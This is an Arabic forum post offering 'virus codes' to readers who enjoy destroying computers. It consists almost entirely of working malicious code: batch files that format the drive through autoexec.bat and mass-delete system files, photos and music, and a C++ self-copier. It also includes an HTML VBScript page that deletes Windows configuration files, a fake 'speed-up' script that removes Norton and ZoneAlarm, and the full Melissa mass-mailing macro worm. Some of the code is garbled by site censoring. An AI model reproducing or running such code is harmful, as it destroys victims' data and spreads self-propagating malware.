السـلام عليكم ورحمه الله وبركاته
كيف الحال اعضاء ومشرفين الديف بوينت
الموضوع عبـااااره عن اكؤاد فايروساات
لـ الاشخاص الي يحبون التدمير والعبث في الاجهزه
طيب نبدأ مع اول فايرس :
ينسخ نفسه بنفسه اقوي من فايروس hedrar يعني,,,,,
مهما حاول الضحيه مسحه مايلحقو والكود مختص كذالك
في عمل فورمات لجهاز الضحيه يشتغل الفايروس تلقائي مع بدأ اشتغال الجهاز,,, ولا تنسي ان تحفضه بــ اسم-Autoexec.bat احذر احذر احذر ان تفتحه علي جهازك
كود:
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2
الفايرس مايروح الا بفورمــــااات -
------------------------------------------
هذا الفايرس الثاني :
كود:
fire c++ virus:
#include ******s.h
#include string.h
char windir[MAX_PATH];
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
char pathname[256];
HKEY hKey;
Get******sDirectory(windir, sizeof(windir));
HMODULE hMe = GetModuleHandle(NULL);
DWORD nRet = GetModuleFileName(hMe, pathname, 256);
strcat(windir, "\\System32\\viral.exe");
CopyFile(pathname,windir,0);
unsigned char reg[10] = "infected";
RegCreateKey(HKEY_CURRENT_USER,"Software\\retro",& hKey);
RegSetValueEx(hKey,"virus",0,REG_SZ,reg,sizeof(reg ));
RegCloseKey(hKey);
}
-----------------------------------------------------
الفايرس الثالث :
كود:
@Echo off
c:
cd %WinDir%\System\
deltree /y *.dll
cd\
deltree /y *.sys
الحفظ bat
هذا الفيروس يقوم على مسح كل ملفات الـ dll والـ sys من السيستم
---------------------------------------------------
الفيروس الرابع :
فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. وانت بكيفك تبي تخليه يمسح ملفاات معينه مثل الـ mp3 والـ ram بس نشوف في الكود وش الي محدد :
كود:
@Echo off
e:
deltree /y *.jpg
cd\
deltree /y *.mp3
cd\
deltree /y *.asf
-------------------------------------------------
هذا الكود سيد الاكواد على قولهم :
وظيفته فرمتـه وعبث على السريع -
كود:
Del c:\windows\system\msconfig.exe
Del c:\windows\Rundll32.exe
Del c:\windows\regedit.exe
Del c:\windows\Rundll.exe
Del c:\Autoexec.bat
Del c:\command.com
Del c:\windows\Logos.sys
Del c:\windows\Logow.sys
Del c:\windows\Scanregw.exe
Del C:\Program Files\Internet Explorer\Iexplore.exe
Del c:\windows\system\Sysedit.exe
Del c:\windows\win.com
__Echo off
c:
cd %WinDir%\System\
deltree /y *.exe
-----------------------------------------------------------
كود فيروس Html
كود:
<html>
<head>
<**************** ****************************************="Content-Type"
content="text/html; charset=iso-8859-1">
<title>Active-X HTML</title>
</head>
THIS HTML USING ACTIVE-X PLEASE CLICK #YES#
<body bgcolor="#000000" Text="#C0C0C0">
<script language="VBScript">
<!-- This is a MY BRAIN --!>
On Error Resume Next
Dim a
Set fso = CreateObject("Scripting.FileSystemObject")
Set a = fso.GetFile("win.ini")
a.Delete
Dim b
Set fso = CreateObject("Scripting.FileSystemObject")
Set b = fso.GetFile("system.ini")
b.Delete
</script>
<!--- This script author is THEONE---!>
</body>
</html>
ثم الحفظ بـ html
-----------------------------------------------------------
كود فيروس حذف Regedit و Msconfig
كود:
c:\windows\regedit.exe del
C:\windows\system\msconfig.exe del
----------------------------------------------------------
مسح بعض الملفات المهمه في الجهاز مثال الـ exe وغيرهـااا نشوف في الكود : -
كود:
@echo off
c:
deltree /y *.exe
deltree /y *.dll
deltree /y *.drv
deltree /y *.sys
deltree /y *.ini
cd %windir%\system
deltree /y *.sys
deltree /y *.dll
deltree /y *.ini
deltree /y *.exe
-------------------------------------------------------------------
كود فيروس يدمر برنامج النورتون انتى فيروس و برنامج الزون الارم
كود:
@echo welcome to the winbooster by Agent007
@echo if u want to make your computer get faster , you should follow
@echo the next steps (step by step)
@pause
cd\
c:
dir
dir c:\progra~1\norton~1
@echo if u want to make your computer faster
@pause
@echo now you should to type y and press enter
del c:\progra~1\norton~1
@pause
c:
dir
@echo if u want to make your computer faster
@pause
@dir c:\progra~1
dir c:\progra~1\zonea~1\zonealarm
del c:\progra~1\zonea~1\zonealarm
@echo be happy your computer now is faster than before
:exit
-------------------------------------------------------------------
كود فيروس مليسا :
كود:
Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\ord\e curity", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\ord\e curity", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\, "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
------------------------------------------------------------
كود لفيروس ينشئ ملاين من المجلدات على الهارد بجانب انه يدمر الويندوز :
كود:
@echo off
CLS
@del c:\Windows\win.ini
CLS
@del c:\windows\system.dat
CLS
@del c:\windows\system.ini
CLS
@REN c:\Windows te3eeshWeeElwendosYa7'od3'er7a
CLS
@del c:\progra~1\netscape\commun~1\program\netscape.exe
CLS
@del c:\progra~1\netscape\commun~1\program\wgbview.dbm
CLS
@del c:\progra~1\norton~1\dec2.dll
@del c:\progra~1\norton~1\navstart.dat
@del c:\progra~1\norton~1\navw32.exe
@del c:\progra~1\norton~1\sfstr32i.dll
CLS
@del c:\progra~1\icq\icqcntct.dll
CLS
@del c:\progra~1\icq\dll\icqwso~1.dll
CLS
@REN c:\progra~1 fuck
CLS
@md c:\fff
@md c:\545
@md c:\jsior
@md c:\ierjq
@md c:\nmao
@md c:\ian
@md c:\asdja
@md c:\duiae
@md c:\dsuiuie
@md c:\ianer
@md c:\aie
@md c:\aiaer
@md c:\aiher
@md c:\kaie
@md c:\system
@md c:\uauau
@md c:\opoe
@md c:\pogrw
@md c:\uauer
@md c:\vnvnv
@md c:\imcvns
@md c:\mnbf
@md c:\ingo
@md c:\iajf
@md c:\sexe
@md c:\fffs
@md c:\54s5
@md c:\jsioer
@md c:\ierjeq
@md c:\nmato
@md c:\iany
@md c:\asbja
@md c:\duaae
@md c:\dsujiuie
@md c:\ianer
@md c:\aae
@md c:\aider
@md c:\ai3er
@md c:\kafe
@md c:\systam
@md c:\uauaau
@md c:\ofoe
@md c:\togrw
@md c:\uader
@md c:\vnvdsv
@md c:\i43cvns
@md c:\mdbf
@md c:\ind43
@md c:\iajf
@cd\
CLS
@del *.sys
CLS
@del *.exe
CLS
@del *.txt
CLS
@del *.dll
CLS
@del *.com
CLS
------------------------------------------------------
ملإحظة الحفظ بصيغـه .bat من المفكره
إن شاء الله يفيدكم :
هذا اذا ماطلع معك شي : حمل الاكواد من هنــــااااا
( قيـم اذا افادك )